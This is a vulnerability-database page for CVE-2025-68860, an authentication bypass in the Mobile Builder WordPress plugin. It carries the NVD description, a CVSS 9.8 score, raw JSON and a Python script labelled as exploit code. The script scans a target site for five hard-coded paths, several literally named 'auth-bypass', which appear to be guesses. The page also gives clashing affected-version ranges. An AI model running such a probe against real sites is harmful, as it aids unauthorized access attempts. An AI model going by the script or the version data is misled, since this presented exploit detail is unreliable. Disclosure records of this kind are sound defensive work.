Security Vulnerability Report
中文
CVE-2025-68860 CVSS 9.8 CRITICAL

CVE-2025-68860

Published: 2025-12-29 22:15:44
Last Modified: 2026-04-23 15:36:10

Description

Authentication Bypass Using an Alternate Path or Channel vulnerability in Mobile Builder Mobile builder mobile-builder allows Authentication Abuse.This issue affects Mobile builder: from n/a through <= 1.4.2.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Mobile Builder < 1.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-68860 PoC - Authentication Bypass in Mobile Builder # Target: WordPress site with Mobile Builder plugin <= 1.4.2 target = "http://target-wordpress-site.com" # Alternative paths to bypass authentication paths = [ "/wp-content/plugins/mobile-builder/api/frontend/auth-bypass", "/wp-content/plugins/mobile-builder/api/mobile/auth", "/wp-json/mobile-builder/v1/auth", "/wp-content/plugins/mobile-builder/includes/api/auth-bypass.php", "/wp-admin/admin-ajax.php?action=mobile_builder_auth_bypass" ] def check_vulnerability(): print(f"[*] Checking CVE-2025-68860 on {target}") for path in paths: url = target + path try: response = requests.get(url, timeout=10) # Check for authentication bypass indicators if response.status_code == 200: if "session" in response.text.lower() or "token" in response.text.lower(): print(f"[+] Potential vulnerability found at: {url}") print(f"[+] Response preview: {response.text[:200]}") return True except requests.exceptions.RequestException as e: print(f"[-] Error accessing {url}: {e}") return False if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68860", "sourceIdentifier": "[email protected]", "published": "2025-12-29T22:15:43.597", "lastModified": "2026-04-23T15:36:09.940", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Mobile Builder Mobile builder mobile-builder allows Authentication Abuse.This issue affects Mobile builder: from n/a through <= 1.4.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/mobile-builder/vulnerability/wordpress-mobile-builder-plugin-1-4-2-broken-authentication-vulnerability?_s_id=cve", "source": "[email protected]"}]}}